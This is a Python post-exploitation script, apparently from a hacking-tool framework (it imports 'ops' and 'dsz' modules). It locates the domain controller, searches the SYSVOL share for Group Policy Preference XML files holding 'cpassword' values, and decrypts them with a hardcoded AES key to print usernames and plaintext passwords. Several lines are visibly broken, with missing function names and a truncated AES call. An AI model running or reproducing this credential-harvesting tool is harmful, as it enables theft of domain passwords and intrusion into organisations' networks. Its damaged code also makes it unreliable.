import ops.cmd import dsz.version, dsz.path, dsz.control, dsz.lp import sys from xml.dom import minidom def main(): found = False dcName = '' domainName = '' try: myCommand = ops.cmd.getDszCommand('domaincontroller -primary') cmdRes = myCommand.execute() dcName = cmdRes.domaincontroller[0].dcname domainName = cmdRes.domaincontroller[0].domainname'The dc is %s for %s' % (dcName, domainName))) except: ops.error('This machine does not appear to be part of the domain') quit() sharePath = ('SYSVOL\\' + domainName) fullShare = ((dcName + '\\') + sharePath) myCommand = ops.cmd.DszCommand('grep', pattern='cpassword', path=fullShare, mask='*xml', recursive=True) cmdRes = myCommand.execute() for xmlfile in cmdRes.file: if xmlfile.line: for ret_value in xmlfile.line: if ('cpassword' in ret_value.value): found = True parsexml(ret_value.value) if (not found):'Failed to find any .xml files in sysvol with creds stored') def decrypt(encpass): sys.path.append('C:\\python27\\lib\\site-packages') import Crypto.Cipher.AES, codecs dc = codecs.getdecoder('Base64') mod = ((4 - (len(encpass[0]) % 4)) % 4) if (not (mod == 0)): encpass += ('=' * mod) decode_encpass = dc(encpass) AESKey = 'N\x99\x06\xe8\xfc\xb6l\xc9\xfa\xf4\x93\x10b\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05y\x90 \x9b\t\xa43\xb6l\x1b' try: test =, Crypto.Cipher.AES.MODE_CBC, ('\x00' * Crypto.Cipher.AES.block_size)) res = test.decrypt(decode_encpass[0]) except Exception as e: ops.error(e) quit() clean_res = res.strip('\x10').replace('\x00', '') return clean_res def parsexml(xmlstring): data = minidom.parseString(xmlstring) userdata = data.getElementsByTagName('User') properties = data.getElementsByTagName('Properties') for i in xrange(0, len(userdata)): name = userdata[i].getAttribute('name') cpassword = properties[i].getAttribute('cpassword') decpassword = decrypt(cpassword)'Name: %s\tPassword: %s' % (name, decpassword))) if (__name__ == '__main__'): main()